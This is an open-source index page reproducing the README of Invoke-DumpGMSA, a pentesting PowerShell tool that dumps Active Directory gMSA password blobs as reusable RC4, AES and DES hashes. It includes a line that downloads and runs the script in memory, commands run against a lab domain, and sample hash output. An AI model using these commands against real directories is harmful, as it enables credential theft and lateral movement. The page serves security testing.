Data

Tools

Indexes

Applications

Experiments

Awesome

An open API service indexing awesome lists of open source software.

https://github.com/the-viper-one/invoke-dumpgmsa

PowerShell script to Dump GMSA Password blobs into RC4, 3DES and AES hash formats.
https://github.com/the-viper-one/invoke-dumpgmsa

active-directory gmsa pentesting powershell

Last synced: 5 months ago
JSON representation

PowerShell script to Dump GMSA Password blobs into RC4, 3DES and AES hash formats.

Awesome Lists containing this project

README 

          
# Invoke-DumpGMSA



PowerShell port of core functionality from https://github.com/rvazarkar/GMSAPasswordReader.



Reads the password blob from a GMSA account using LDAP, and parses the values into hashes for re-use.



## Usage

> Load into memory

```powershell

IRM 'https://raw.githubusercontent.com/The-Viper-One/Invoke-DumpGMSA/refs/heads/main/Invoke-DumpGMSA.ps1' | IEX

```

> Commands

```powershell

# Search for all GMSA accounts and attempt to parse the password blob

Invoke-DumpGMSA -Domain "ESSOS.LOCAL" -Server "MEEREEN.ESSOS.LOCAL"



# Target a specific account by DistinguishedName

Invoke-DumpGMSA -Domain "ESSOS.LOCAL" -Server "MEEREEN.ESSOS.LOCAL" -DN "CN=gmsaDragon,CN=Managed Service Accounts,DC=essos,DC=local"

```

> Example Output

```

PS > Invoke-DumpGMSA -Domain "ESSOS.LOCAL" -Server "MEEREEN.ESSOS.LOCAL"



Authenticated to MEEREEN.ESSOS.LOCAL as ESSOS\BRAAVOS$



GMSA Account         : ESSOS.LOCAL\gmsaDragon$

Password valid until : 10/09/2025 14:54:59



rc4_hmac             : 85b952359bee0656b74f4259810f7cad

aes128_cts_hmac_sha1 : c985f4f4d9c2b033bbff1feb25b5aa22

aes256_cts_hmac_sha1 : 25430549f280401c239c175588c1f8e9b0cbd44e9496e4e0c54b9d03d18c5aca

des_cbc_md5          : efa47ab31ae0d92f

```

> Example Output (Lack of permissions)

```

PS > Invoke-DumpGMSA -Domain "ESSOS.LOCAL" -Server "MEEREEN.ESSOS.LOCAL"



Authenticated to MEEREEN.ESSOS.LOCAL as SEVENKINGDOMS\Moe

Found GMSA but no rights to read msDS-ManagedPassword as SEVENKINGDOMS\Moe

```